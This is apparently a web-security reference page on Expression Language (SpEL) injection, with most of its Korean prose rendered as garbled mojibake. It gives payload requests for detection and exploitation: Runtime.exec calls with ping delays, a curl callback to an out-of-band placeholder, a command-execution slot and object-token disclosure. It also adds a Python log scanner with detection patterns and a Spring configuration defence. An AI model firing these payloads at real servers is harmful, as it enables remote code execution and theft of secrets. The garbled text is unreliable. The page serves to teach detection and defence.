EL(Expression Language) Injection

๐Ÿ” Introduction

EL(Expression Language) Injection์€ Expression์„ ์ฒ˜๋ฆฌํ•˜๋Š” EL interpreter์— ๋Œ€ํ•œ Injection ๊ณต๊ฒฉ์œผ๋กœ SSTI, OGNL Injection๊ณผ ์œ ์‚ฌํ•จ์„ ๊ฐ€์ง‘๋‹ˆ๋‹ค.

🗡 Offensive techniques

Detect

๋งŒ์•ฝ Spring์—์„œ Expression์„ ํ†ตํ•ด ์•„๋ž˜์™€ ๊ฐ™์ด ์ฒ˜๋ฆฌํ•˜๊ณ  ์žˆ๋‹ค๋ฉด param.msg ์ฆ‰ data๋ž€ ์ด๋ฆ„์˜ ํŒŒ๋ผ๋ฏธํ„ฐ๋Š” Expression Language๋กœ ์ฒ˜๋ฆฌ๋˜๊ธฐ ๋–„๋ฌธ์— Injection์„ ํ†ตํ•ด์„œ ๊ณต๊ฒฉ์ž๊ฐ€ ์›ํ•˜๋Š” ๊ตฌ๋ฌธ์„ ์ฃผ์ž…ํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

<spring:message code="${param.data}" />

GET /log?data=${param.test}&test=INJECTION HTTP/1.1
Host: localhost

EL Injection์— ๋Œ€ํ•œ ํƒ์ง€๋Š” ๋ณดํ†ต SSTI์™€ ์œ ์‚ฌํ•œ ํ˜•ํƒœ๋กœ ์ง„ํ–‰๋˜๋ฉฐ, ์ด์™ธ์—๋„ ์ง์ ‘ Expression ๊ตฌ๋ฌธ์„ ์ „์†กํ•˜์—ฌ ์„œ๋ฒ„๊ฐ€ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฐฉ์‹์„ ์ฒดํฌํ•˜๋Š” ํ˜•ํƒœ๋กœ ์ด๋ฃจ์–ด์ง‘๋‹ˆ๋‹ค.

GET /log?data=${T(java.lang.Runtime).getRuntime().exec("COMMANDS")} HTTP/1.1
Host: localhost

Time-Based

GET /log?data=${T(java.lang.Runtime).getRuntime().exec("ping -c 5 127.0.0.1")} HTTP/1.1
Host: localhost

ping ์ฒดํฌ ์‹œ 5ํšŒ ์ฒดํฌํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์•ฝ 5์ดˆ์˜ ๋”œ๋ ˆ์ด๊ฐ€ ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค.

OAST-Based

GET /log?data=${T(java.lang.Runtime).getRuntime().exec("curl <OAST-SERVICE>")} HTTP/1.1
Host: localhost

You can confirm the injection by checking that a DNS query and an HTTP request arrive at the OAST service.

Exploitation

RCE

Expression์€ ์–ธ์–ด์— ๋”ฐ๋ผ ๋‹ค๋ฅด์ง€๋งŒ ๋ณดํ†ต Server-Side Application์—์„œ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ๊ณผ ์œ ์‚ฌํ•œ ๊ถŒํ•œ์„ ๊ฐ€์ง€๊ธฐ ๋•Œ๋ฌธ์— ์ด๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์ž๊ฐ€ ์˜๋„ํ•œ ๋ช…๋ น์„ ์ „๋‹ฌํ•˜๊ณ  ์‹คํ–‰ํ•˜์—ฌ ์„œ๋ฒ„๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

GET /log?data=${T(java.lang.Runtime).getRuntime().exec("악의적인 명령 실행")} HTTP/1.1
Host: localhost

RCE Tirkc์€ SSTI์—์„œ Expression์— ๋Œ€ํ•ด ๋ช…์‹œ๋˜์–ด ์žˆ์œผ๋‹ˆ ์ฐธ๊ณ  ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.

Information Disclosure

Expression์„ ํ†ตํ•ด Object๋ฅผ ์ฐธ์กฐํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ํ†ต์ œ๋œ Object ๋‚ด๋ถ€์˜ ๊ฐ’์„ ํ˜ธ์ถœํ•˜์—ฌ ์ •๋ณด๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

GET /log?data=${admin.internalToken} HTTP/1.1
Host: localhost
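The Detect and Exploitation sections above describe EL payloads from the attacker's side. The defender's counterpart is spotting those same shapes in access logs. The script below is an added example (not code from the original page or from Cullinan): it percent-decodes the query string of each request line, extracts `${...}` / `#{...}` expressions, and classifies them by the payload shapes shown above (parameter-reference probe, Runtime.exec with a ping delay, Runtime.exec with an out-of-band callback, plain object navigation). The log lines are constructed for the example; `oast.example` is a placeholder host.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not captured from a real server).
SAMPLE_LOG = [
    'GET /log?data=hello HTTP/1.1',
    'GET /log?data=${param.test}&test=INJECTION HTTP/1.1',
    'GET /log?data=${T(java.lang.Runtime).getRuntime().exec("ping -c 5 127.0.0.1")} HTTP/1.1',
    'GET /log?data=%24%7BT(java.lang.Runtime).getRuntime().exec(%22curl%20oast.example%22)%7D HTTP/1.1',
    'GET /log?data=${admin.internalToken} HTTP/1.1',
    'GET /search?q=price%20%3C%20%2410 HTTP/1.1',
]

# "METHOD target [HTTP/x.y]"; the target may contain literal spaces in raw logs.
REQUEST_LINE = re.compile(r'^\S+\s+(?P<target>.+?)(?:\s+HTTP/\d(?:\.\d)?)?$')
# Both EL delimiter forms: ${...} (immediate) and #{...} (deferred EL / SpEL).
EL_EXPR = re.compile(r'[$#]\{(?P<body>[^}]*)\}')
# Bodies that reach Java runtime objects via a SpEL type reference or Runtime.exec.
TYPE_REF = re.compile(r'\bT\s*\(\s*java\.', re.IGNORECASE)
RUNTIME_EXEC = re.compile(r'getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(', re.IGNORECASE)
# Payload shapes from the Detect section: delay-based and out-of-band callbacks.
TIME_BASED = re.compile(r'\b(?:ping\s+-[cn]\s+\d+|sleep\s+\d+)\b', re.IGNORECASE)
OAST = re.compile(r'\b(?:curl|wget|nslookup|dig)\s', re.IGNORECASE)
# Reference to another request parameter: the classic "is it evaluated?" probe.
PARAM_REF = re.compile(r'\bparam\.\w+')


def decode_query(request_line, max_rounds=3):
    """Return the fully percent-decoded query string of a request line ('' if none).
    Decoding repeats (bounded) so double-encoded payloads are still exposed."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m or '?' not in m.group('target'):
        return ''
    query = m.group('target').split('?', 1)[1]
    for _ in range(max_rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query


def classify_expression(body):
    """Map one EL expression body to a finding category (most severe first)."""
    if RUNTIME_EXEC.search(body) or TYPE_REF.search(body):
        if OAST.search(body):
            return 'oast-callback'
        if TIME_BASED.search(body):
            return 'time-based'
        return 'rce'
    if PARAM_REF.search(body):
        return 'evaluation-probe'
    # Plain property navigation such as ${admin.internalToken}: possible
    # information disclosure, but not provable from the request alone.
    return 'object-access'


def scan_request_line(request_line):
    """Return a list of (category, expression) findings for one log line."""
    query = decode_query(request_line)
    return [(classify_expression(m.group('body')), m.group(0))
            for m in EL_EXPR.finditer(query)]


def scan_log(lines):
    """Return {line_index: findings} for every line carrying at least one EL expression."""
    report = {}
    for i, line in enumerate(lines):
        findings = scan_request_line(line)
        if findings:
            report[i] = findings
    return report


if __name__ == '__main__':
    for idx, findings in scan_log(SAMPLE_LOG).items():
        for category, expr in findings:
            print(f'line {idx}: {category:16} {expr}')
```

The `object-access` category is deliberately low confidence: a bare `${...}` in a query string is unusual but not always hostile, so it is worth alerting on at lower severity rather than blocking outright, while `rce`, `time-based` and `oast-callback` findings on an endpoint that evaluates EL warrant immediate triage.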

🛡 Defensive techniques

Basic

๊ธฐ๋ณธ์ ์ธ ๋Œ€์‘๋ฐฉ์•ˆ์€ SSTI์™€ ๋™์ผํ•ฉ๋‹ˆ๋‹ค.

https://www.hahwul.com/cullinan/ssti/#-defensive-techniques

SpEL

SePL(Spring Expression Language)์˜ ๊ฒฝ์šฐ Spring framework์˜ web.xml์— springJspExpressionSupport๋ฅผ false๋กœ ์ง€์ •ํ•˜์—ฌ ๊ธฐ๋ณธ์ ์ธ SePL Injection์„ ์˜ˆ๋ฐฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<context-param>
  <description>Spring Expression Language Support</description>
  <param-name>springJspExpressionSupport</param-name>
  <param-value>false</param-value>
</context-param>

📚 Articles

📌 References

Licensed under CC BY-NC-SA 4.0